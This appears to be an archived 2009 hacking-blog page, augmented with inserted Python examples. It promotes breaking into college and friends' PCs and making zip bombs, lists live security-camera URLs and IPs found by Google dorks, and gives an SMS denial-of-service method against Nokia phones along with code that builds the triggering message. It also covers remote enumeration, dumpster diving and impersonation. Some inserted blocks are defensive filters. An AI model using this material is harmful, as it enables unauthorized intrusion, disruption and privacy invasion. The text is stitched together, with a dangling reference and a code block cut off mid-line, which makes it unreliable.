Wednesday, December 30, 2009

TOP 7 Must Read Articles at PROHACK – 2009 Reviewed

As 2009 draws to a close, it is time to review what I did on PROHACK and share the best of it with you folks again. I believe these articles are a must read if you have been a regular here, and doubly so if you are not. Prohack has gotten better with you guys and it would not have been possible without you. So, here are the Top 7 must read articles at PROHACK -
Create a Zip Bomb of Death
A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked, its contents are more than the system can handle. You can make your own zip bomb to annoy your friends or just out of curiosity, to experiment with it. Make sure you don't detonate it on yourself.
How to Hack Administrator from Guest Account
Ever wanted to hack your college PC from a guest/student account so that you can download at full speed there? Or just wanted to hack your friend's PC to make him gawk when you tell your success story? Well, there is a neat way of hacking an administrator account from a guest account by which you can reset the administrator password and get all the privileges an administrator enjoys on Windows. Interested?
Hack PHP 4.4 websites in 20 seconds
Sites running PHP 4.4 have a SQL injection vulnerability that makes their admin control panel easily accessible; in one big shot, you will be admin of that site. Keep in mind that SQL injection is a flaw in how the application builds its queries, not in the PHP interpreter itself, so the PHP version is at best a rough indicator of which sites to check.
Top 10 Tips to optimize your website
Making a website is easy, but making it survive the Wild Wild Web is quite a formidable task. I have seen many promising websites crumble and vanish from the web in a short span of time, and today I will be sharing my knowledge with you. I have followed 10 simple rules which have won me the love of my readers in a short time and have made ProHack more than just a name on the web. Read them and follow them.
Top 10 Anticipated games of 2009
2009 proved to be a great year for gaming, and developers want to keep the roller coaster ride of top releases going with extremely hyped games from the top dogs of gaming. The list is compiled based on how much is known about the game, how incredible it looks and current user reviews; the following big boys made it onto the top 10 most anticipated games of 2009.
Hack LG KG195 for Increased Features
I used to have an LG KG195, an average mobile by LG Electronics. A modest mobile with modest features, it has Bluetooth, a basic media player and a VGA camera. However, I soon got bored of this set and decided to tweak it to make it a more desirable device. Learn how to hack LG devices.
Top 10 LINUX speed hacks
As an extremely reliable operating system, Linux rarely needs to be rebooted. But when it does, it is often slow to boot. Loads of Matrix-style lines scrolling down the screen are sure to drive you nuts, added to the boot time of GUI initialization. Fortunately, there are ways to speed things up. Some of these methods are not terribly difficult (although some, unfortunately, are). Let's take a look at the top 10 speed hacks for Linux and let your Linux box be reincarnated with speed.
Bonus -
Resident Evil 5 – An Honest Review
Resident Evil 5 was one of the most hyped games of this generation and was prominently featured in various Top 10 lists. The incredible amount of hype it generated was due to the long development period, the over-the-top gorgeous trailers, gory in-game footage and plain curiosity about whether it would be able to surpass its legendary predecessor.
5 Types of Virus Writers
Whilst stumbling around the net, I found this humorous description of 5 types of virus writers written by an actual hacker. I really loved the overall tone of the article and thought it worth sharing with you guys. Enjoy.

Happy new year..

PS : Like this tutorial ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

Posted by XERO. All Rights Reserved.


Learn How to Hack Online Security Cameras using Google Hacking

Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable web applications. Although Google blocks some of the better known Google hacking queries, nothing stops an attacker from crawling your site and running the Google Hacking Database queries directly against the crawled content.

The Google Hacking Database is located at http://johnny.ihackstuff.com.

To find security cameras through Google, type the following into the Google search box exactly as shown and hit Enter:

inurl:"viewerframe?mode=motion"

Click on any of the search results. I found the following:
  • http://66.209.109.2:60006/ViewerFrame?Mode=Motion&Language=0
  • http://birdtable.derby-college.ac.uk/ViewerFrame?Mode=Motion&Language=4
  • http://125.206.34.116/cgi-bin/ViewerFrame?Mode=Motion&Resolution=640x480&Quality=Motion&Interval=10&Size=STD&PresetOperation=Move&Language=0
  • http://cube.northwestcollege.edu/ViewerFrame?Mode=Motion&Language=0
and many more...

Another search query through which you can gain access to other cameras is:

intitle:"Live View / - AXIS"
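The point above, that Google blocking a query does not protect you because anyone can crawl your site and run the same dork offline, is easy to demonstrate. The following is an added example (not code from the original post or from the Google Hacking Database): a small matcher that applies inurl:/intitle: style dorks to crawl records. The crawl records are constructed sample data; the two dorks are the ones quoted above (with a plain hyphen in the AXIS title).

```python
# Added example, not from the original post: run Google-hacking style queries
# against your own crawl data, offline, to see what a dork would surface.
# CRAWL is constructed sample data; the dorks are the two from the post.
import shlex

# Constructed sample crawl: (url, <title>) pairs as a site crawler would record them.
CRAWL = [
    ("http://cam.example.edu/ViewerFrame?Mode=Motion&Language=0", "Network Camera"),
    ("http://www.example.edu/index.html", "Example College - Home"),
    ("http://lobby.example.edu/view/index.shtml", "Live View / - AXIS 210 Network Camera"),
    ("http://www.example.edu/about.html", "About Example College"),
]

SUPPORTED = ("inurl", "intitle")


def parse_dork(dork):
    """Split a dork into (operator, value) terms. shlex keeps a quoted value such
    as "Live View / - AXIS" together; bare words become ('any', word)."""
    terms = []
    for token in shlex.split(dork):
        op, sep, value = token.partition(":")
        if sep and op.lower() in SUPPORTED and value:
            terms.append((op.lower(), value))
        else:
            terms.append(("any", token))
    return terms


def matches(terms, url, title):
    """Every term must match; comparison is case-insensitive, like Google's."""
    u, t = url.lower(), title.lower()
    where = {"inurl": (u,), "intitle": (t,), "any": (u, t)}
    return all(any(value.lower() in hay for hay in where[op]) for op, value in terms)


def run_dork(dork, crawl=CRAWL):
    """Return the crawled URLs a dork would surface."""
    terms = parse_dork(dork)
    return [url for url, title in crawl if matches(terms, url, title)]


if __name__ == "__main__":
    for dork in ('inurl:"viewerframe?mode=motion"', 'intitle:"Live View / - AXIS"'):
        print(dork, "->", run_dork(dork))
```

Anything this turns up on your own crawl is reachable by anyone who crawls you, whether or not Google indexes it; a camera or admin interface that matches belongs behind authentication or a VPN, not behind robots.txt.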

Google is a pretty powerful search tool; you knew that. You can use it to find information, but you can also use it to find downloadable MP3s, books, videos, and other items.

We are going to assume you are just looking for legally available downloads, but the truth of the matter is that if someone has posted an MP3 (copyrighted or not) to their web page, Google can find it.

But who has the time to memorize all the search modifiers (index of, last modified, parent directory, description, size, (.mp3|.wma|.ogg) and so on)? That's where Google Hacks comes in. This handy little app will let you search for dozens of file types, song lyrics, cached pages, fonts, and other little goodies hanging out on the web.

Just download and install Google Hacks for Mac, Linux, or Windows, fire it up, enter your search term and check the boxes next to the type of search you want to perform. Your results will show up in your default web browser.

To download Google Hack Software CLICK HERE

Chinese novelist Mian Mian sued Google

A Beijing judge has told the Chinese novelist Mian Mian, who is suing Google over its plan to create an online library, to hold settlement talks.

After a two-hour hearing, the court ordered both sides to talk but did not set a deadline for reporting back, according to the author's lawyer.
She is seeking damages of 61,000 yuan ($8,950; £5,576) and a public apology.

The lawsuit was filed in October after Google scanned one of Mian Mian's books, Acid House, into its library.

Google said it had removed the book as soon as it learned of the lawsuit, but had no further comment on the case.

Mian Mian writes risque novels - including titles such as Panda Sex and Candy - about China's underworld of sex, drugs and nightlife. Most of her work is banned in China.

She is not alone in complaining about copyright issues raised by Google's online library. The China Written Works Copyright Society is also looking for compensation for other Chinese authors whose work is included in the project.

In France, a court ordered Google to stop digitising French books without the publisher's approval. The search engine was also told to pay 300,000 euros ($430,000; £268,000) in damages and interest to French company La Martiniere, which had sued for copyright infringement for scanning book excerpts.

In the US, Google agreed a $125m settlement with American authors and publishers - although this is still waiting for final court approval.

SOURCE: BBC News

Tuesday, December 29, 2009

How to Hack Nokia Phones – Remote DDOS Attack using SMS

Yes, one can hack Nokia phones just by sending an SMS; seems devilish, doesn't it? Although this vulnerability was found more than a year ago, I recently tried it and found it working on many sets. The vulnerability, dubbed "Curse of Silence", affects the Nokia Symbian S60/Series 60 devices listed below and allows a remote SMS/MMS denial of service: one can send a specially crafted SMS to lock up or crash a vulnerable Series 60 device. A single sender is enough, so strictly this is a DoS rather than a DDoS.

What is Required ?

  • MSISDN (phone number) of the target.
  • A mobile service provider which allows sending SMS messages (Airtel in my case).
  • (Almost) any Nokia phone, or some other means of sending SMS messages with TP-PID set to "Internet Electronic Mail".

Risk Levels

Although the vulnerability is spread across many versions of the S60 platform, the risk level is High for S60 2.6 and 3.0 devices, as after the attack the target will not be able to receive any SMS or MMS messages until the device is factory reset, and Medium for S60 2.8 and 3.1 devices, as the target will not be able to receive any SMS or MMS messages while the attack is ongoing; after that, only very limited message receiving is possible until the device is factory reset.

The Attack

One can send an email via SMS by setting the message's Protocol Identifier (TP-PID) to "Internet Electronic Mail" and formatting the message like this:

<email-address><space><message body>

The simplest attack will be -

[email protected]

If such a message contains an <email-address> of more than 32 characters, S60 2.6, 2.8, 3.0 and 3.1 devices fail to display the message or give any indication on the user interface that such a message has been received. They do, however, signal to the SMS centre (SMSC) that they have received the message.

Devices running S60 2.6 or 3.0 will not be able to receive any other SMS message after that. The user interface does not give any indication of this situation. The only action to remedy this situation seems to be a factory reset of the device (by entering "*#7370#") or using a Vulcan Death Grip.

Devices running S60 2.8 or 3.1 react a little differently: they do not lock up until they have received at least 11 SMS-email messages with an email address longer than 32 characters. After that the device will not be able to receive any other SMS message, and the phone will just display a warning that there is not enough memory to receive further messages and that data should be deleted first. This message is displayed even on an otherwise completely "empty" device.

After switching the phone off and on again, it has limited capability for receiving SMS messages again: If it receives a SMS message that is split up into several parts it is only able to receive the first part and will display the "not enough memory" warning again. After powercycling the device again, it can then receive the second part. If there is a third part, it has to be powercycled again, and so on.

Also, an attacker now just needs to send one more "Curse Of Silence" message to lock the phone up again. By always sending yet another one as soon as the status report for delivery of the previous message is received, the attacker could completely prevent a target from receiving any other SMS/MMS messages.

Only factory resetting the device will restore its full message receiving capabilities. Note that if a backup is made using Nokia PC Suite *after* being attacked, the blocking messages are also backed up and will be sent to the device again when the backup is restored after the factory reset.
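What "TP-PID set to Internet Electronic Mail" and "an email address longer than 32 characters" look like at the PDU level is worth seeing, both to understand the trigger and to write a filter for it. The following is an added example, not code from the original post or from the advisory: it builds an SMS-SUBMIT PDU with TP-PID 0x32 (the GSM 03.40 value for Internet Electronic Mail), packs the text with the GSM 7-bit default alphabet, and then parses a PDU back to decide whether it has the Curse of Silence shape. The target number and addresses are constructed sample data; nothing is transmitted.

```python
# Added example, not from the original post: build and inspect an SMS-SUBMIT PDU
# whose TP-PID is "Internet Electronic Mail" (0x32, GSM 03.40 section 9.2.3.9),
# and flag PDUs whose leading e-mail address exceeds 32 characters. Target number
# and e-mail addresses below are constructed sample data; no SMS is sent.

PID_INTERNET_EMAIL = 0x32   # TP-PID: telematic interworking, Internet Electronic Mail
CURSE_ADDRESS_LEN = 32      # addresses longer than this trigger the S60 bug

# GSM 03.38 default 7-bit alphabet, index == septet value. Note '@' is 0x00, '_' is 0x11.
GSM7 = (
    "@£$¥èéùìòÇ\nØø\rÅå"
    "Δ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ"
    " !\"#¤%&'()*+,-./"
    "0123456789:;<=>?"
    "¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§"
    "¿abcdefghijklmnopqrstuvwxyzäöñüà"
)
assert len(GSM7) == 128


def pack7(text):
    """Map text to GSM 7-bit septets and pack them LSB-first into octets."""
    bits, nbits, out = 0, 0, bytearray()
    for ch in text:
        if ch not in GSM7:
            raise ValueError(f"not in GSM default alphabet: {ch!r}")
        bits |= GSM7.index(ch) << nbits
        nbits += 7
        while nbits >= 8:
            out.append(bits & 0xFF)
            bits >>= 8
            nbits -= 8
    if nbits:
        out.append(bits & 0xFF)
    return bytes(out)


def unpack7(data, septets):
    """Inverse of pack7: recover `septets` characters from packed octets."""
    bits, nbits, chars = 0, 0, []
    for b in data:
        bits |= b << nbits
        nbits += 8
        while nbits >= 7 and len(chars) < septets:
            chars.append(GSM7[bits & 0x7F])
            bits >>= 7
            nbits -= 7
    return "".join(chars)


def encode_address(digits):
    """TP-DA: digit count, type-of-address 0x91 (international), nibble-swapped BCD."""
    padded = digits + ("F" if len(digits) % 2 else "")
    swapped = "".join(padded[i + 1] + padded[i] for i in range(0, len(padded), 2))
    return bytes([len(digits), 0x91]) + bytes.fromhex(swapped)


def build_email_sms(target_msisdn, email, body):
    """SMS-SUBMIT (no SMSC prefix) carrying '<email> <body>' with TP-PID = Internet Electronic Mail."""
    user_data = f"{email} {body}"
    return (bytes([0x01, 0x00])                  # first octet: SMS-SUBMIT, no validity period; TP-MR = 0
            + encode_address(target_msisdn)
            + bytes([PID_INTERNET_EMAIL, 0x00])  # TP-PID, TP-DCS = 7-bit default alphabet
            + bytes([len(user_data)])            # TP-UDL counts septets
            + pack7(user_data))


def parse_submit(pdu):
    """Minimal SMS-SUBMIT parser (7-bit DCS, no user data header)."""
    i = 2                                        # skip first octet and TP-MR
    ndigits = pdu[i]
    i += 2 + (ndigits + 1) // 2                  # length, type-of-address, BCD digits
    pid, dcs, udl = pdu[i], pdu[i + 1], pdu[i + 2]
    i += 3
    if dcs != 0x00:
        raise ValueError("example only handles the 7-bit default alphabet")
    return {"pid": pid, "udl": udl, "text": unpack7(pdu[i:], udl)}


def is_curse_of_silence(pdu):
    """True when the PDU is an SMS-email whose address (text before the first space) exceeds 32 chars."""
    fields = parse_submit(pdu)
    if fields["pid"] != PID_INTERNET_EMAIL:
        return False
    address = fields["text"].split(" ", 1)[0]
    return len(address) > CURSE_ADDRESS_LEN


if __name__ == "__main__":
    # Constructed sample: a 40-character local part makes the address 52 characters long.
    long_addr = "a" * 40 + "@example.com"
    pdu = build_email_sms("491701234567", long_addr, "hi")
    print(pdu.hex().upper())
    print("curse of silence:", is_curse_of_silence(pdu))
```

A carrier-side or gateway filter only needs the last two functions: look at TP-PID, and if it is 0x32, measure the text up to the first space. Ordinary SMS-email addresses fit comfortably under 32 characters, so the rule has little collateral.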

Detailed List of affected phones

Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable component is S60 base functionality, it seems safe to assume that all devices with these OS versions are affected. In short, if you own one of these, you are exposed unless you have a firmware upgrade/fix released by Nokia that addresses this attack.

S60 3rd Edition, Feature Pack 1 (S60 3.1)

  • Nokia E90 Communicator
  • Nokia E71
  • Nokia E66
  • Nokia E51
  • Nokia N95 8GB
  • Nokia N95
  • Nokia N82
  • Nokia N81 8GB
  • Nokia N81
  • Nokia N76
  • Nokia 6290
  • Nokia 6124 classic
  • Nokia 6121 classic
  • Nokia 6120 classic
  • Nokia 6110 Navigator
  • Nokia 5700 Xpress Music

S60 3rd Edition, initial release (S60 3.0)

  • Nokia E70
  • Nokia E65
  • Nokia E62
  • Nokia E61i
  • Nokia E61
  • Nokia E60
  • Nokia E50
  • Nokia N93i
  • Nokia N93
  • Nokia N92
  • Nokia N91 8GB
  • Nokia N91   
  • Nokia N80
  • Nokia N77
  • Nokia N73
  • Nokia N71
  • Nokia 5500
  • Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8)

  • Nokia N90
  • Nokia N72
  • Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6)

  • Nokia 6682
  • Nokia 6681
  • Nokia 6680
  • Nokia 6630

 

Credits

Tobias Engel – The Original Vulnerability Founder

Tested and implemented on the Airtel network using Nokia 3120 classic and N70/N73/E51 by XERO

Nokia N900 Review

The market has been flooded with smartphones recently, and the iPhone stole the show by merging great looks with some really cool widgets, making it a must-have. Losing its dominance over the smartphone market, the Finnish mobile king Nokia is fighting back by releasing the N900. Earlier Nokia smartphones came with the home-grown Symbian OS, but this time Nokia has experimented by packing the N900 with the Linux distribution Maemo 5, itself a slimmed-down derivative of Debian, and has added a host of top-end features, including a sizeable 3.5in touch screen, slide-out QWERTY keyboard, 5Mp camera with Carl Zeiss optics, Wi-Fi, A-GPS, quad-band and much more besides.
 Nokia N900
The N900 is a beauty to behold and chiseled to perfection (keeping in mind that I tend to get sentimental every time I see a cool gadget). It sports a sleek screen and black minimalistic looks and feels very pocketable. The keypad is quite tactile and responsive despite the small keys.
Maemo 5 looks quite similar to its Symbian predecessor, and Nokia has made a promising move by moving on to an open source Linux platform (three cheers to Nokia). The OS is powered by a fast ARM Cortex-A8 processor with OpenGL ES 2.0 graphics and performs well, providing additional usability with a great user interface.
N900 Maemo 5 Interface
Frequent tasks like SMSing and emailing are easy on the N900. It also supports Facebook widgets and sports a browser based on Firefox, which is a good thing as it can handle multiple pages at once and updates them in real time. The camera takes surprisingly good pictures owing to its Carl Zeiss lens, and while it doesn't have a huge range of settings, it does offer macro, action and portrait modes, plus a dual LED flash, though there's no smile detection, timer or multi-shot option.
Nokia N900 front
Watching videos is a delight on the N900; the 800x480 screen vividly displays videos in amazing quality. It supports the major video formats and has a TV-out option too. The music player of the N900 is attractive and the phone itself is bundled with above-average earphones. There is a basic FM radio which doesn't support autotune. The phone has 32 GB of onboard memory and supports a 16 GB external microSD card (just in case you are not satisfied with putting your entire audio collection on it). Call quality is good, but the battery is a concern: owing to the use of multimedia apps, it barely lasted a day under heavy use.
N900 is bundled with above average earphones
Final Verdict
The Nokia N900 is a definitive phone if you have enough moolah to buy one. The Linux OS is solid, the interface intuitive, and at the end of the day it's a Nokia, the second name of quality (correct me if I'm wrong). It's a joy to use, a beauty to behold and the ultimate phone to flaunt to your friends. Nothing more, nothing less.
Price in India – $650, 500 EURO, INR 34000/- approx

-XERO
You can also read the N96 Review

Sunday, December 27, 2009

United States finally appoints new Cybersecurity Coordinator: Mr.Howard Schmidt

The White House announced on Tuesday the appointment of former eBay chief security strategist Howard Schmidt to the post, six months after President Barack Obama pledged to appoint a cybersecurity adviser. The White House said Schmidt will also work closely with the president's economic team to ensure that cybersecurity efforts keep the nation secure and prosperous.

In 1967, Schmidt joined the Air Force and served in a variety of capacities until 1983, when he joined the police force in Chandler, Arizona, according to an online biography. In 1994, he served as a computer-forensics investigator for the FBI's Drug Intelligence Center and has served in similar capacities for the U.S. Air Force and the U.S. Army Reserves. He subsequently spent five years at Microsoft as the chief security strategist, leaving to join the Bush administration as Special Advisor to the President for Cybersecurity in 2001. He returned to the private sector in 2003, joining eBay as chief security strategist.

Since leaving eBay in 2005, Schmidt has worked in a number of different posts, including at the U.S. Department of Homeland Security.

The White House said the president was personally involved in the selection of Mr. Schmidt, and that he will have regular and direct access to the president on cybersecurity issues.

Clarke is the chairwoman of the House Committee on Homeland Security's Subcommittee on Emerging Threats, Cybersecurity and Science and Technology, which legislates many cybersecurity issues.

In May, the president released a review of the nation's cybersecurity policies and established the post of Cybersecurity Coordinator. Since then, numerous security professionals had refused the post.

SOURCE: www.securityfocus.com

IIS service vulnerability leaves users to attack

Another critical vulnerability has been found in the Microsoft IIS web server which allows malicious users to upload malicious files by appending innocent-looking filename extensions like "jpg" to them. The problem arises from the way Microsoft IIS parses file names with colons or semicolons in them, which can allow attackers to bypass upload filters and potentially trick the server into executing their code.

Soroush Dalili, the security researcher who found the flaw, commented: "Impact of this vulnerability is absolutely high as an attacker can bypass file extension protections by using a semicolon after an executable extension such as '.asp,' '.cer,' '.asa' and so on." He continued: "Many web applications are vulnerable against file uploading attacks because of this weakness of IIS."

Secunia,a Danish computer security service provider,confirmed the bug on a machine running a fully patched version of Windows 2003 R2 SP2 with Microsoft IIS version 6.

A Microsoft spokeswoman said company researchers are investigating the report. They are not aware of attacks targeting the reported vulnerability, she said.
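The weakness Dalili describes lives in the upload handler as much as in IIS: a check that looks only at the text after the last dot accepts "shell.asp;.jpg", while IIS serves it as "shell.asp". The following is an added example, not code from the article, Dalili or Microsoft: the naive check, a small model of the described name parsing (cutting at the first ';' or ':'), and a hardened replacement. The extension lists and filenames are constructed for illustration.

```python
# Added example, not from the original article: the extension check many upload
# handlers relied on, beside a hardened replacement. iis6_effective_name() is this
# example's model of the parsing behaviour described above (the name is cut at the
# first ';' or ':'); it illustrates the report and is not Microsoft's code.
import os
import re
import uuid

ALLOWED_IMAGE = {"jpg", "jpeg", "png", "gif"}
SERVER_SIDE = {"asp", "asa", "cer"}          # extensions named in the report


def naive_allowed(filename):
    """Vulnerable check: trusts whatever follows the last dot."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_IMAGE


def iis6_effective_name(filename):
    """Model of the described behaviour: 'shell.asp;.jpg' is handled as 'shell.asp'."""
    return re.split(r"[;:]", filename, maxsplit=1)[0]


def would_execute(filename):
    """Does the effective name end in an extension handled by the ASP engine?"""
    name = iis6_effective_name(filename)
    return "." in name and name.rsplit(".", 1)[-1].lower() in SERVER_SIDE


def hardened_name(filename, allowed=ALLOWED_IMAGE):
    """Accept only '<stem>.<ext>' with a safe character set and an allowed ext,
    then store under a server-generated name so the client's name is never used."""
    base = os.path.basename(filename.replace("\\", "/"))
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}", base):
        return None                              # rejects ';', ':', extra dots, path parts
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in allowed:
        return None
    return f"{uuid.uuid4().hex}.{ext}"


if __name__ == "__main__":
    for name in ("photo.jpg", "shell.asp;.jpg", "shell.asp:.jpg", "photo.png.asp"):
        print(f"{name:16} naive={naive_allowed(name)!s:5} executes={would_execute(name)!s:5} "
              f"stored_as={hardened_name(name)}")
```

Renaming on the server side matters beyond this bug: it also defeats double extensions, path fragments and any future parser quirk, and storing uploads outside any script-mapped directory removes the execution path entirely.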

 

Via The Register

Learn How to Enumerate MAC Address and Total NICs using GETMAC

  1. The GETMAC application identifies the Media Access Control (MAC) address assigned to each network interface card (NIC) of the target.
  2. GETMAC also reveals the total number of NICs on the target.
  3. Establish a NULL session to the target first (or supply credentials with the /U and /P switches).
  4. Then, from a command prompt, run: getmac /S <IP address>
  5. The target's MAC addresses have been identified, as well as the total number of NICs. In this case, two NICs have been identified, as shown in the figure below.
  6. In this case, the target has the following MAC addresses for each identified NIC:
NIC 1: 00-0C-29-A3-E4-40
NIC 2: 24-C8-20-52-41-53
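Beyond the count, the MAC addresses themselves tell you something: the first three octets are the vendor OUI, and 00-0C-29 is registered to VMware, so NIC 1 above is almost certainly a virtual machine. The following is an added example, not code from the original post: it parses the two-column output of getmac /S <host> /FO CSV /NH (physical address, transport name), counts real NICs, and annotates each with a hypervisor OUI hint and the locally-administered bit. SAMPLE_OUTPUT is constructed text in that format; the first two MACs are the ones from the post, the transport GUIDs and the third row are made up.

```python
# Added example, not from the original post: parse `getmac /S <host> /FO CSV /NH`
# output, count NICs and annotate each MAC. SAMPLE_OUTPUT is constructed sample text.
import csv
import io
import re

SAMPLE_OUTPUT = (
    '"00-0C-29-A3-E4-40","\\Device\\Tcpip_{1A2B3C4D-0000-1111-2222-333344445555}"\n'
    '"24-C8-20-52-41-53","\\Device\\Tcpip_{66667777-8888-9999-AAAA-BBBBCCCCDDDD}"\n'
    '"N/A","Media disconnected"\n'
)

MAC_RE = re.compile(r"^([0-9A-F]{2}-){5}[0-9A-F]{2}$")

# OUIs registered to hypervisor vendors (IEEE OUI registry); a hit suggests a VM.
VM_OUIS = {
    "00-0C-29": "VMware",
    "00-50-56": "VMware",
    "08-00-27": "VirtualBox",
    "00-15-5D": "Hyper-V",
}


def parse_getmac(text):
    """Return [(mac, transport)] for rows carrying a real MAC; skip 'N/A' rows."""
    rows = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 2:
            continue
        mac = row[0].strip().upper()
        if MAC_RE.match(mac):
            rows.append((mac, row[1]))
    return rows


def describe(mac):
    """Vendor hint from the OUI plus the U/L bit (set => software-assigned address)."""
    first_octet = int(mac[:2], 16)
    return {
        "mac": mac,
        "vendor_hint": VM_OUIS.get(mac[:8]),
        "locally_administered": bool(first_octet & 0x02),
    }


def summarize(text):
    nics = parse_getmac(text)
    return {"nic_count": len(nics), "nics": [describe(mac) for mac, _ in nics]}


if __name__ == "__main__":
    result = summarize(SAMPLE_OUTPUT)
    print("NICs:", result["nic_count"])
    for nic in result["nics"]:
        print(nic)
```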


Dumpster Diving and Personnel are strong Social Engineering Techniques

  • An attacker can easily retrieve information the company considers sensitive from what is thrown out daily in the normal garbage cans.
  • One can literally climb into the company's dumpsters and pilfer through the garbage.
  • Critical information such as names, Social Security numbers, addresses, phone numbers, account numbers, balances, and so forth is thrown out every day somewhere.
  • Many companies still use carbon paper in their fax machines. Once the roll is used up, they simply throw the entire roll in the dumpster. The information on that roll is priceless, including names, addresses, account numbers, phone numbers, how much they actually pay or take, and so forth.
  • Another social engineering attack that also proves very successful exploits the failure to verify personnel credentials: an attacker dresses in the uniform of personnel considered "honest", "important" or even "expensive". For example, an attacker purchases or steals the uniform of a courier, telephone, gas or electric company employee and appears carrying boxes and/or clipboards, pens, tools, etc., perhaps even an "official-looking" identification badge or a dolly carrying "equipment". These attackers generally have unchallenged access throughout the building, as employees tend to see "through" these types of people.

Saturday, December 26, 2009

How Hackers Manipulate the Live Data Stream on Internet

1. First of all, install WebGoat and configure the web browser.
2. We will use the tool Achilles. It is a tool designed for testing the security of web applications. Achilles is a proxy server which acts as a man-in-the-middle during an HTTP session. For more about Achilles, please check its official website.
3. Double-click the webgoat.exe icon in the directory containing the WebGoat application.


4. Configure the LAN settings as shown in the figure below.


5. Run the Achilles application and select the following options, as shown in the figure below:


Intercept mode ON
Intercept Client Data
Ignore .jpg/.gif
Select Log to File - Save the data
6. Your Achilles screen should look like the following.

7. Open Internet Explorer and arrange both windows side by side on your desktop, as shown below.


8. Click the Start button in Achilles and notice that the status bar along the lower-left side of Achilles will let you know it is running.
9. In the address bar of Internet Explorer, enter the following address:
http://localhost/WebGoat/attack/

10. Press Enter, and Achilles will list the data flowing through to the Tomcat application. Click the Send button in Achilles. You will be presented with a login screen. For the user name and password enter the word guest, then click the Send button again.
11. Click the Send button again and the WebGoat screen will be displayed in the web browser.
12. Under the Unvalidated Parameters section, find the Hidden Field Tampering lesson and click on it.
13. Click the Send button again.
14. WebGoat will appear with a shopping cart as shown below.

15. Click the Purchase button. Within Achilles you will see the intercepted request with QTY=1 and Price=4999.99. Suppose you want to make a purchase whose actual cost is 4999.99 but you have only 1.99 in your account: within Achilles, edit 4999.99 to 1.99 and then click the Send button.

16. Eureka! The sale has completed, with a total charge of $1.99.

NOTE: THIS IS ONLY A DEMONSTRATION OF THIS TECHNIQUE AND FOR EDUCATIONAL PURPOSES ONLY
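The sale goes through because the server charges whatever price the hidden field carries. The following is an added example, not WebGoat's code or part of the original post: the proxy edit from step 15 applied to a captured POST body, a checkout handler that trusts the form (and so accepts $1.99), and a hardened handler that takes the price from its own catalogue and treats a client-supplied price that disagrees as a tampering signal. The catalogue, field names, request body and account balance are constructed sample data.

```python
# Added example, not from the original post or WebGoat: the server side of the
# hidden-field tampering walked through above. Catalogue, field names, request
# body and balance are constructed sample data.
from urllib.parse import parse_qs, parse_qsl, urlencode

CATALOGUE = {"TV": 4999.99}      # constructed: the server's own price list
ACCOUNT_BALANCE = 1.99           # constructed: what the buyer actually has

# Constructed capture of the Purchase POST body, with the hidden Price field.
ORIGINAL_BODY = "QTY=1&SUBMIT=Purchase&Price=4999.99&Item=TV"


def tamper(body, field, new_value):
    """What the intercepting proxy does: rewrite one field of the captured POST body."""
    pairs = [(k, new_value if k == field else v) for k, v in parse_qsl(body)]
    return urlencode(pairs)


def checkout_trusting_form(body):
    """Vulnerable: the price comes from the hidden form field."""
    form = parse_qs(body)
    qty = int(form["QTY"][0])
    price = float(form["Price"][0])
    total = round(qty * price, 2)
    return ("ok" if total <= ACCOUNT_BALANCE else "declined", total)


def checkout_server_priced(body):
    """Hardened: the price is looked up server-side; the hidden field is never trusted."""
    form = parse_qs(body)
    item = form.get("Item", [""])[0]
    qty = int(form.get("QTY", ["0"])[0])
    if item not in CATALOGUE or qty < 1:
        return ("rejected", 0.0)
    total = round(qty * CATALOGUE[item], 2)
    sent = form.get("Price", [None])[0]
    if sent is not None and float(sent) != CATALOGUE[item]:
        return ("tampered", total)   # log it: the client disagrees with our price
    return ("ok" if total <= ACCOUNT_BALANCE else "declined", total)


if __name__ == "__main__":
    edited = tamper(ORIGINAL_BODY, "Price", "1.99")
    print("tampered body:   ", edited)
    print("trusting handler:", checkout_trusting_form(edited))
    print("hardened handler:", checkout_server_priced(edited))
```

The general rule the lesson teaches: anything the browser sends, hidden field, cookie or JavaScript-computed total, is attacker-controlled input; prices, roles and identifiers must be resolved on the server from data the client cannot reach.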

Tuesday, December 22, 2009

Twitter's domain name hijacked by the "Iranian Cyber Army."

On Thursday, an unknown attacker hijacked Twitter's domain name and redirected visitors to an unrelated site hosting a page claiming Twitter had been hacked by the "Iranian Cyber Army." Evidence indicates, however, that the attackers were able to change the domain-name system (DNS) entries at Twitter's provider, Dyn Inc., said Rod Rasmussen, president and CEO of Internet Identity, an infrastructure security firm which monitors DNS changes.

"First of all the name servers themselves didn't change, so someone was updating things at the provider," Rasmussen said. Because other clients were not showing signs of DNS hijacking, it's unlikely that Dyn itself had been breached, Rasmussen said. "We didn't see anything else at Dyn that indicated signs of that the service had been compromised."

On Friday, Dyn confirmed that the attacker had the proper credentials to log into Twitter's account with the company and change the addresses assigned to various hosts in the Twitter.com domain. While some media reports have called the attack a hack or a defacement of the site, neither term applies, said Kyle York, vice president of sales and marketing for the firm.

"From our point of view, no unauthenticated users logged into the system," York said.
In reality, the company's domain name had been hijacked by the vandals and visitors redirected to an unrelated site hosting the page. Passive DNS records showed the change: Twitter's record pointed first to two domains registered in Moldova and then to a domain registered to an undisclosed person in Pompano Beach, Florida, according to information posted by the SANS Internet Storm Center.

Twitter acknowledged the issue late last night, following earlier media reports.
"Twitter’s DNS records were temporarily compromised but have now been fixed," the site administrators' wrote at 11:28 p.m. PT. "We are looking into the underlying cause and will update with more information soon."
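Rasmussen's reasoning above, that the name servers did not change so the edit happened inside the provider account rather than at the registrar, is exactly the distinction a DNS monitor should make. The following is an added example, not code from the article, Internet Identity or Dyn: it walks a passive-DNS style feed and raises a delegation alert when an NS record leaves the expected set, and a provider-level alert when an A record points outside the address ranges the owner declared. The domain, ranges and feed are constructed sample data, not Twitter's.

```python
# Added example, not from the original article: a passive-DNS style monitor that
# separates a delegation (NS) change at the registrar from an A-record change made
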